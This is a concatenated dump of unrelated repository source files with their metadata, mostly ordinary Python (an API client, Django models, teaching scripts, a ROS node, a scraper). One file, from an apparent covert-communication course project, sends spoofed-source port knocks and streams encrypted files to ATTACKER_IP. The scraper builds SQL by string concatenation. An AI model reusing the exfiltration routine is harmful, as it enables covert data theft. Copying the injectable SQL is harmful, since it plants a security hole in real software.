print('Leaving state8')
def on_enter_state9(self, update):
update.message.reply_text("(I'm entering state9)\n")
#self.go_back(update)
def on_exit_state9(self, update):
print('Leaving state9')
def on_enter_state10(self, update):
update.message.reply_text("(I'm entering state10)\nI'll open the spotify app for you")
#self.go_back(update)
def on_exit_state10(self, update):
print('Leaving state10')
|
[
"cloudstrife60138@gmail.com"
] |
cloudstrife60138@gmail.com
|
ea1421d3eef4bc9eefc004968959b201b28dc4d2
|
c927b1b9adc0670c3111cd8e4f1285ffd4e54cef
|
/python/seldon_deploy_sdk/api/batch_jobs_api.py
|
70fa4a370ec85fa13f3d48a4bd6215262c1b51b8
|
[
"Apache-2.0"
] |
permissive
|
FarrandTom/seldon-deploy-client
|
79d92224a69ef9241b73154e20aaa38b9e049cf4
|
bfc0dd958743f395b8b781b2e8216cc5f8f9e749
|
refs/heads/master
| 2023-01-20T00:24:15.768347
| 2020-11-26T09:34:05
| 2020-11-26T09:34:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,340
|
py
|
# coding: utf-8
"""
Seldon Deploy API
API to interact and manage the lifecycle of your machine learning models deployed through Seldon Deploy. # noqa: E501
OpenAPI spec version: v1alpha1
Contact: hello@seldon.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from seldon_deploy_sdk.api_client import ApiClient
class BatchJobsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_seldon_deployment_batch_job(self, name, namespace, workflow, **kwargs): # noqa: E501
"""create_seldon_deployment_batch_job # noqa: E501
Create the seldondeployment's batch jobs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_seldon_deployment_batch_job(name, namespace, workflow, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name identifies a resource (required)
:param str namespace: Namespace provides a logical grouping of resources (required)
:param BatchDefinition workflow: WorkflowName (required)
:return: UID
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_seldon_deployment_batch_job_with_http_info(name, namespace, workflow, **kwargs) # noqa: E501
else:
(data) = self.create_seldon_deployment_batch_job_with_http_info(name, namespace, workflow, **kwargs) # noqa: E501
return data
def create_seldon_deployment_batch_job_with_http_info(self, name, namespace, workflow, **kwargs): # noqa: E501
"""create_seldon_deployment_batch_job # noqa: E501
Create the seldondeployment's batch jobs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_seldon_deployment_batch_job_with_http_info(name, namespace, workflow, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name identifies a resource (required)
:param str namespace: Namespace provides a logical grouping of resources (required)
:param BatchDefinition workflow: WorkflowName (required)
:return: UID
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'workflow'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_seldon_deployment_batch_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `create_seldon_deployment_batch_job`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `create_seldon_deployment_batch_job`") # noqa: E501
# verify the required parameter 'workflow' is set
if ('workflow' not in params or
params['workflow'] is None):
raise ValueError("Missing the required parameter `workflow` when calling `create_seldon_deployment_batch_job`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'workflow' in params:
body_params = params['workflow']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/namespaces/{namespace}/seldondeployments/{name}/batchjobs', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UID', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_deployment_batch_job(self, name, namespace, job_name, **kwargs): # noqa: E501
"""get_deployment_batch_job # noqa: E501
Get details on the seldondeployment's batch job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_batch_job(name, namespace, job_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name identifies a resource (required)
:param str namespace: Namespace provides a logical grouping of resources (required)
:param str job_name: JobName identifies a job name (required)
:return: BatchJob
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_deployment_batch_job_with_http_info(name, namespace, job_name, **kwargs) # noqa: E501
else:
(data) = self.get_deployment_batch_job_with_http_info(name, namespace, job_name, **kwargs) # noqa: E501
return data
def get_deployment_batch_job_with_http_info(self, name, namespace, job_name, **kwargs): # noqa: E501
"""get_deployment_batch_job # noqa: E501
Get details on the seldondeployment's batch job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_batch_job_with_http_info(name, namespace, job_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name identifies a resource (required)
:param str namespace: Namespace provides a logical grouping of resources (required)
:param str job_name: JobName identifies a job name (required)
:return: BatchJob
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'job_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_deployment_batch_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_deployment_batch_job`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `get_deployment_batch_job`") # noqa: E501
# verify the required parameter 'job_name' is set
if ('job_name' not in params or
params['job_name'] is None):
raise ValueError("Missing the required parameter `job_name` when calling `get_deployment_batch_job`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
if 'job_name' in params:
path_params['jobName'] = params['job_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/namespaces/{namespace}/seldondeployments/{name}/batchjobs/{jobName}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BatchJob', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_seldon_deployment_batch_jobs(self, name, namespace, **kwargs): # noqa: E501
"""list_seldon_deployment_batch_jobs # noqa: E501
Read the seldondeployment's batch jobs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_seldon_deployment_batch_jobs(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name identifies a resource (required)
:param str namespace: Namespace provides a logical grouping of resources (required)
:param str limit: Limit of items returned in one response
:param str page: Requested page
:return: BatchDescriptionList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_seldon_deployment_batch_jobs_with_http_info(name, namespace, **kwargs) # noqa: E501
else:
(data) = self.list_seldon_deployment_batch_jobs_with_http_info(name, namespace, **kwargs) # noqa: E501
return data
def list_seldon_deployment_batch_jobs_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""list_seldon_deployment_batch_jobs # noqa: E501
Read the seldondeployment's batch jobs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_seldon_deployment_batch_jobs_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name identifies a resource (required)
:param str namespace: Namespace provides a logical grouping of resources (required)
:param str limit: Limit of items returned in one response
:param str page: Requested page
:return: BatchDescriptionList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'limit', 'page'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_seldon_deployment_batch_jobs" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `list_seldon_deployment_batch_jobs`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `list_seldon_deployment_batch_jobs`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'page' in params:
query_params.append(('Page', params['page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/namespaces/{namespace}/seldondeployments/{name}/batchjobs', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BatchDescriptionList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
[
"agm@seldon.io"
] |
agm@seldon.io
|
4c12d6c896c4460ce3cf13fc5e489758157c9092
|
4904acd900496b4883c2f5b4aa6b45d1ef6654c0
|
/graphgallery/nn/layers/tensorflow/__init__.py
|
27608f8342dd120c8fa2199d9a62271dd3402705
|
[
"MIT"
] |
permissive
|
blindSpoter01/GraphGallery
|
aee039edd759be9272d123463b0ad73a57e561c7
|
e41caeb32a07da95364f15b85cad527a67763255
|
refs/heads/master
| 2023-06-17T11:42:27.169751
| 2021-07-15T03:07:39
| 2021-07-15T03:07:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 152
|
py
|
from .conv import *
from .top_k import Top_k_features
from .dropout import *
from .misc import SparseConversion, Scale, Sample, Gather, Laplacian, Mask
|
[
"cnljt@outlook.com"
] |
cnljt@outlook.com
|
0b3c762d62a61ea50b5248ea260cc0b2539f9c05
|
1049843fc2931f8c0d997be409a0bdaab0610c3c
|
/shop/contrib/stock/models.py
|
e3ae13f28c6ce0036fdb8a944a6050abb2e97dfe
|
[] |
no_license
|
Optixdesigns/django-shop
|
212b0a8a7c561dfadf8d306d0141588316d94f2d
|
a58028a3fe638c8c6ba3b37e139290657ffc0d13
|
refs/heads/master
| 2020-04-06T05:47:54.101765
| 2012-10-31T14:44:07
| 2012-10-31T14:44:07
| 4,168,793
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 589
|
py
|
# -*- coding: utf-8 -*-
from django.db import models
from django.utils.translation import ugettext_lazy as _
class VariantStockLevelMixin(models.Model):
"""
Mixin for configurable Variant models
"""
sku = models.CharField(_('SKU'), max_length=128, db_index=True, unique=True,
help_text=_('ID of the product variant used'
' internally in the shop.'))
stock_level = models.DecimalField(_("stock level"), max_digits=10,
decimal_places=4, default=0)
class Meta:
abstract = True
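# Illustrative usage (an assumption, not part of this module): a concrete
# variant model only needs to inherit the mixin to get `sku` and `stock_level`,
# e.g.
#
#   class ProductVariant(VariantStockLevelMixin):
#       product = models.ForeignKey('shop.Product', related_name='variants')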
|
[
"sjoerd@optixdesigns.com"
] |
sjoerd@optixdesigns.com
|
3605eda012bbbdc82374e58cba08581a97dc808f
|
6d59b155bcf3a61ff677d8ca103215af20ba40cd
|
/python/05/05Animal_Class.py
|
5c17da84c29d38fbfc3acd81ba08db49037633a7
|
[] |
no_license
|
lilgaage/lilgaage_scripts
|
1c82ba869e637a5971215b2eb084f3b2e9a4b954
|
9108f821c634ffae05423083b9330281f3ae5a57
|
refs/heads/main
| 2023-08-20T13:01:48.670270
| 2021-10-21T09:16:15
| 2021-10-21T09:16:15
| 419,627,782
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,009
|
py
|
class Animal:
def __init__(self,name,age,gender,weight):
        # Non-private attributes
self.name = name
self.age = age
self.gender = gender
        # Private attribute: cannot be inherited and cannot be accessed outside the class
self.__weight = weight
    # Private method: cannot be inherited and cannot be called outside the class
def __eat(self,food):
print("{}不爱吃肉,爱吃{}".format(self.name,food))
    # Non-private methods
def run(self):
print("{}吃完饭了喜欢跑来跑去".format(self.name))
def shower(self):
print("{}喜欢吃饭前去洗澡".format(self.name))
def introduce(self):
msg = "{}是一个{}孩子,小可爱今年才{}岁,但是体重居然已经{}斤了。"
print(msg.format(self.name,self.gender,self.age,self.__weight))
self.__eat("鬼鬼") #调用私有化方法
# Dog class: the subclass inherits the parent class and gets all of its non-private attributes and methods
class Dog(Animal):
def drink(self):
print("{}喜欢喝牛奶".format(self.name))
    # The subclass overrides the parent method of the same name
def run(self):
print("{}吃完饭了就在那躺着,根本就不动".format(self.name))
class Cat(Animal):
def __init__(self,name,age,gender,weight):
        super(Cat,self).__init__(name,age,gender,weight)  # use the super keyword to call the parent constructor
self.name = name
print("我是{}".format(self.name))
def getName(self):
return "Cat"+self.name
def drink(self):
print("{}喜欢喝酸奶".format(self.name))
a1 = Animal("瑰丝",18,"女",40)
a1.run()
# a1.__eat("鬼鬼") #私有方法不能在类的外部被调用
# print(a1.__weight)  # private attributes cannot be accessed outside the class
d1 = Dog("小瑰",3,"男",20)
# The subclass calls the parent's non-private methods
d1.introduce()
d1.drink()
# When the subclass calls a method it has overridden, its own version is used instead of the parent's
d1.run()
c1 = Cat("娃琳可",2,"女",18)
c1.introduce()
|
[
"noreply@github.com"
] |
lilgaage.noreply@github.com
|
87589d298b01d75146ed1956e271d9ba5e9f5e0c
|
040c49dd116ad6ff69a61a60c9fc2dc3d17da6d0
|
/pdtry.py
|
c4d32dd9979ac9ebfeca0f12ae13657b280e1b42
|
[] |
no_license
|
raulsanika015/python
|
0dba12d62a32b7cbcd1c50c018a6ab4f56cf9472
|
cf2e73192e180efe3357cbc5477b9abe1469f818
|
refs/heads/master
| 2020-08-13T10:43:57.942184
| 2019-10-14T13:38:45
| 2019-10-14T13:38:45
| 214,956,298
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 970
|
py
|
'''
import pandas as pd
# reading csv file from url
data = pd.read_csv("book1.csv")
# creating short data of 5 rows
d = data.head()
# creating list with 5 values
list =[1000,2000,3000,4000,5000]
# adding list data
# creating new column
d["Added values"]= d["SALARY"].add(list)
# display
print(d)
print(d["SALARY"].prod())
print(d["SALARY"].sum())
'''
# importing pandas module
import pandas as pd
# reading csv file from url
data = pd.read_csv("Book1.csv")
# dropping null value columns to avoid errors
data.dropna(inplace = True)
# storing dtype before converting
before = data.dtypes
# converting dtypes using astype
data["SALARY"]= data["SALARY"].astype(int)
data["CONTACT"]= data["CONTACT"].astype(str)
# storing dtype after converting
after = data.dtypes
# printing to compare
print("BEFORE CONVERSION\n", before, "\n")
print("AFTER CONVERSION\n", after, "\n")
|
[
"noreply@github.com"
] |
raulsanika015.noreply@github.com
|
a56f9ca0f4e70237db43a581038292f080b3a26d
|
41d020c1155337889b2a55d03dd842dabee4118a
|
/sls/completion/complete.py
|
a028fecd5f409d68d2e210fbd04f7d932c120579
|
[
"Apache-2.0"
] |
permissive
|
wilzbach/storyscript-sls
|
417aeeb51d5e1f5a19d9401e2a7196104a7c723a
|
d71d74a53852ebae54bdaab341678b04f2775411
|
refs/heads/master
| 2020-04-30T12:46:08.848392
| 2020-01-28T14:19:20
| 2020-01-28T14:19:20
| 176,835,051
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,902
|
py
|
from sls.logging import logger
import sls.sentry as sentry
from .ast import ASTAnalyzer
from .cache import ContextCache
from .context import CompletionContext
log = logger(__name__)
class Completion:
"""
Builds a completion list
"""
def __init__(self, context_cache, plugins):
self.context_cache = context_cache
self.plugins = plugins
def gather_completion(self, context):
for plugin in self.plugins:
ret = plugin.complete(context)
# serialize all items
for item in ret:
# check whether serialization is necessary
if isinstance(item, dict):
yield item
else:
yield item.to_completion(context)
def complete(self, ws, doc, pos):
""""
See the LSP Protocol on Completion [1].
[1] https://microsoft.github.io/language-server-protocol/specification#textDocument_completion
""" # noqa
# Initialize context
context = CompletionContext(ws=ws, doc=doc, pos=pos)
log.info("Word on cursor: %s", context.word)
# Update context caches
self.context_cache.update(context)
try:
items = self.gather_completion(context)
items = sorted(items, key=lambda x: x["label"])
except BaseException as e:
sentry.handle_exception(e)
items = []
return {
            # Indicates that the list is not complete.
# Further typing should result in recomputing this list.
"isIncomplete": False,
"items": items,
}
@classmethod
def full(cls, service_registry):
context_cache = ContextCache(service_registry.hub)
return cls(
context_cache=context_cache,
plugins=[ASTAnalyzer(service_registry, context_cache),],
)
|
[
"seb@wilzba.ch"
] |
seb@wilzba.ch
|
3da4401d31604b9dbd226ce90a6be1b1f2237f26
|
2da0be64bb7a608b984b5ef6022f29821662078b
|
/additional/compare_numpy_fftw.py
|
bac377db1b367a8571d5a55341fc0c70044c4d0c
|
[] |
no_license
|
ahelm/fftw-examples
|
08766a34ff1a9b2f651595285abae13859e0e9e5
|
42243147adf5db0d9868f06aacd6a36807b0e541
|
refs/heads/master
| 2020-03-31T13:48:44.478366
| 2018-10-23T18:16:12
| 2018-10-23T18:16:12
| 152,269,933
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 757
|
py
|
# run first FFTW_simple - to store the data
import numpy as np
import matplotlib.pyplot as plt
in_arr = np.fromfile("fftw_simple_in.raw", dtype=np.double)
in_arr = np.reshape(in_arr, (512, 2))
np_in = in_arr[:, 0] + 1.0j * in_arr[:, 1]
plt.figure()
plt.title("input arr")
plt.plot(in_arr[:, 0], "o", mfc="none")
plt.plot(in_arr[:, 1], "o", mfc="none")
plt.plot(np.real(np_in), "x")
plt.plot(np.imag(np_in), "x")
out_arr = np.fromfile("fftw_simple_out.raw", dtype=np.double)
out_arr = np.reshape(out_arr, (512, 2))
np_out = np.fft.fft(np_in)
plt.figure()
plt.title("|output arr - numpy output|")
plt.plot(out_arr[:, 0], "o", mfc="none")
plt.plot(out_arr[:, 1], "o", mfc="none")
plt.plot(np.real(np_out), "x")
plt.plot(np.imag(np_out), "x")
plt.show()
|
[
"anton.helm@tecnico.ulisboa.pt"
] |
anton.helm@tecnico.ulisboa.pt
|
11ce75d4bd2254ce4e7db74f5a9d3ba44e7599a7
|
8a96bfce1186a3464aa84e46febd9a8d6d94207b
|
/utils.py
|
ffd381a762cc7f91208b7115a9fbe2ec1d83e8bf
|
[] |
no_license
|
Nishan-Vivek/BCIT-COMP8505-Final-Covert-Communication-App
|
70983336ec8dc2acf0d4618a05b6f901ac071003
|
d9acafba9df0cc28cbb662fa2d203e295589782b
|
refs/heads/master
| 2022-03-27T08:38:28.091349
| 2020-01-13T01:35:21
| 2020-01-13T01:35:21
| 112,429,756
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,498
|
py
|
from crypto import *
from time import sleep
from scapy.all import *
from scapy.layers.inet import IP, UDP
def send_file(file_path):
print('Sending File...')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ATTACKER_IP, FILE_TRANSFER_PORT))
file = open(file_path, 'rb')
s.send(encrypt(os.path.split(file_path)[1]))
data = file.read(4096)
while 1:
s.send(encrypt(data))
data = file.read(4096)
if not data:
break
s.close()
def knock():
print('Knock1')
packet = IP(dst=ATTACKER_IP, src=knock_1) / UDP(sport=int(VICTIM_PORT), dport=int(ATTACKER_PORT)) / "Knock"
send(packet)
sleep(1.5)
print('Knock2')
packet = IP(dst=ATTACKER_IP, src=knock_2) / UDP(sport=int(VICTIM_PORT), dport=int(ATTACKER_PORT)) / "Knock"
send(packet)
sleep(1.5)
print('Knock3')
packet = IP(dst=ATTACKER_IP, src=knock_3) / UDP(sport=int(VICTIM_PORT), dport=int(ATTACKER_PORT)) / "Knock"
send(packet)
sleep(1.5)
def listen_for_file():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = socket.gethostname()
print (host)
s.bind((host, FILE_TRANSFER_PORT))
s.listen(5)
conn, addr = s.accept()
print (addr)
data = decrypt(conn.recv(4096))
print data
f = open(data, 'wb')
while 1:
data = decrypt(conn.recv(4096))
if not data:
break
print data
f.write(data)
conn.close()
f.close()
s.close()
|
[
"adamharrison2012@gmail.com"
] |
adamharrison2012@gmail.com
|
d7e40bfc0631bb952596d974e34621b6bd016d0d
|
4c6dd374b4b9ac6b6d8dae55399f754bdf2e5dd1
|
/scripts/motion_estimator.py
|
a3c38541a1e175c3a5458f1c42650fdd9f1d642e
|
[] |
no_license
|
SubMishMar/golfcart_utilities
|
4f3bc92e795f5005a6b012e83f263da1bd84ad14
|
2f12a8211078dfaa90ba049c0f3c8846d52e0ef0
|
refs/heads/master
| 2020-04-05T10:17:46.071806
| 2019-01-14T19:10:18
| 2019-01-14T19:10:18
| 156,793,386
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 776
|
py
|
#!/usr/bin/env python
# license removed for brevity
import rospy
import math
import numpy as np
from nav_msgs.msg import Odometry
class integrator:
def __init__(self):
self.odom_sub = rospy.Subscriber('/Odom', Odometry, self.odomCallback)
self.predicted_x = 0
self.predicted_y = 0
self.predicted_z = 0
self.firstTime = True
    def odomCallback(self, data):
        # On the first message there is no previous timestamp, so only record it.
        now = data.header.stamp.to_sec()
        if self.firstTime:
            self.firstTime = False
            self.last_time = now
            return
        dt = now - self.last_time
        self.last_time = now
        vel_x = data.twist.twist.linear.x
        vel_y = data.twist.twist.linear.y
        vel_z = data.twist.twist.linear.z
        self.predicted_x = self.predicted_x + vel_x*dt
        self.predicted_y = self.predicted_y + vel_y*dt
        self.predicted_z = self.predicted_z + vel_z*dt
if __name__ == '__main__':
rospy.init_node('motion_estimator', anonymous=True)
odometry = integrator()
rospy.spin()
|
[
"subodheenitr@gmail.com"
] |
subodheenitr@gmail.com
|
df0e854af66e4b08013f10764efbf283604e605a
|
cf5f24e5a32f8cafe90d4253d727b1c0457da6a4
|
/algorithm/boj_2003.py
|
512b9e6a296d25c4afedb26eb17489dad3e85a78
|
[] |
no_license
|
seoljeongwoo/learn
|
537659ca942875f6846646c2e21e1e9f2e5b811e
|
5b423e475c8f2bc47cb6dee09b8961d83ab08568
|
refs/heads/main
| 2023-05-04T18:07:27.592058
| 2021-05-05T17:32:50
| 2021-05-05T17:32:50
| 324,725,000
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 374
|
py
|
import sys
input = sys.stdin.readline
n,m = map(int,input().split())
a = list(map(int,input().split()))
left,right,s=0,0,0
ret = 0
while left < n and right <n :
if s == m: ret += 1
if s <=m :
s += a[right]
right += 1
else:
s -= a[left]
left += 1
while left < n:
if s == m: ret += 1
s -= a[left]
left += 1
print(ret)
|
[
"noreply@github.com"
] |
seoljeongwoo.noreply@github.com
|
ac023013317edfede1cf982dffd58bc1ae0dd1b4
|
d806039aacec6aa3719f41989bf3322a319abdd8
|
/PGGAN/utils.py
|
c20dc647c48646e8571b6ef20705f1ea4dd18dcb
|
[
"MIT"
] |
permissive
|
MingtaoGuo/DCGAN_WGAN_WGAN-GP_LSGAN_SNGAN_RSGAN_BEGAN_ACGAN_PGGAN_TensorFlow
|
7cbce46b78f6e254c729df351bc127740a060e84
|
af6a012a9e9ddff29195b12988f3e66091696ff0
|
refs/heads/master
| 2022-09-18T13:04:49.324624
| 2022-08-20T01:47:15
| 2022-08-20T01:47:15
| 139,560,429
| 173
| 39
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,041
|
py
|
import scipy.io as sio
import numpy as np
def read_data(path):
for i in range(1, 6):
if i == 1:
data_mat = sio.loadmat(path + "data_batch_" + str(i) + ".mat")
data = np.transpose(np.reshape(data_mat["data"], [10000, 3, 32, 32]), [0, 2, 3, 1])
labels = data_mat["labels"]
else:
data_mat = sio.loadmat(path + "data_batch_" + str(i) + ".mat")
temp = np.transpose(np.reshape(data_mat["data"], [10000, 3, 32, 32]), [0, 2, 3, 1])
data = np.concatenate((temp, data), axis=0)
labels = np.concatenate((data_mat["labels"], labels), axis=0)
return data, labels
def get_batch(data, batchsize):
data_nums = data.shape[0]
rand_select = np.random.randint(0, data_nums, [batchsize])
batch = data[rand_select]
z = np.random.normal(0, 1, [batchsize, 512])
return batch, z
def read_face_data(path):
data = sio.loadmat(path)
return data["data"]
# a, b = read_data("./dataset/")
# a = 0
|
[
"noreply@github.com"
] |
MingtaoGuo.noreply@github.com
|
ef454ebddbb7786708aa91884bd25fe6756beed6
|
953bb4e6f2d72d714a895bbf3c50a7cbf64e6ab5
|
/accounts/migrations/0003_auto_20180604_2223.py
|
1c66e0e289befbb20448852a43768efe97039666
|
[] |
no_license
|
yunielgarcia/Profile-Project
|
fbe12dba5bda0d027f2015c71a4c627c41af9537
|
42ccf3371b03b49d3f16e662f3fdcbf6db955532
|
refs/heads/master
| 2020-03-18T10:55:51.825028
| 2018-06-08T17:53:46
| 2018-06-08T17:53:46
| 134,641,008
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 576
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.12 on 2018-06-04 22:23
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0002_auto_20180525_2158'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='bio',
field=models.TextField(validators=[django.core.validators.MinLengthValidator(10, 'Description must be at least 10 characters')]),
),
]
|
[
"garciayuni84@gmail.com"
] |
garciayuni84@gmail.com
|
90868a593f6afc79c41a0c22489435edcc8682a9
|
95f9d23dc2d931c447752754d1fae0c979f43591
|
/python_exam/zhuaqu/zhuaqu.py
|
cd63e5d306bfadd15b8be82f09bcb7a996238f1d
|
[] |
no_license
|
18801499823/first
|
a459067f8a00d88dcd484f93e2d6f2266ccd2b39
|
1a1beb2da75fa15fbcbc34f3ae405118ff4bceb3
|
refs/heads/master
| 2020-08-03T18:18:56.832889
| 2016-11-18T11:56:52
| 2016-11-18T11:56:52
| 73,539,600
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,607
|
py
|
#!F:\Python27\python.exe
# -*- coding: UTF-8 -*-
print
import urllib
import urllib2
import re
import MySQLdb
print
class News:
#init
def __init__(self):
self.url = "http://news.baidu.com/"
#convert div to ''
def tranTags(self, x):
pattern = re.compile('<div.*?</div>')
res = re.sub(pattern, '', x)
return res
#getPage
def getPage(self):
url = self.url
request = urllib2.Request(url)
response = urllib2.urlopen(request)
return response.read()
#get navCode
def getNavCode(self):
page = self.getPage()
pattern = re.compile('(<div id="menu".*?)<i class="slogan"></i>', re.S)
navCode = re.search(pattern, page)
return navCode.group(1)
#get nav
def getNav(self):
navCode = self.getNavCode()
pattern = re.compile('<a href="(http://.*?/).*?>(.*?)</a>', re.S)
        items = re.findall(pattern, navCode)
        return items
# Open the database connection
db = MySQLdb.connect("localhost","root","root","sql",charset="GBK")
# Use the cursor() method to obtain a cursor
cursor = db.cursor()
news = News()
new=news.getNav()
for item in new:
print item[0],news.tranTags(item[1])
title = news.tranTags(item[1])
    # SQL insert statement
sql = "INSERT INTO news_data(nav_title,url)VALUES('"+title+"','"+item[0]+"')"
try:
        # Execute the SQL statement
cursor.execute(sql)
        # Commit to the database
db.commit()
except:
# Rollback in case there is any error
db.rollback()
# Close the database connection
db.close()
|
[
"you@example.com"
] |
you@example.com
|
f648d9d8a853fc774588882252c25034dc6e3331
|
5b4cca08e9a9de82baf8021b5aaa39efe96f619b
|
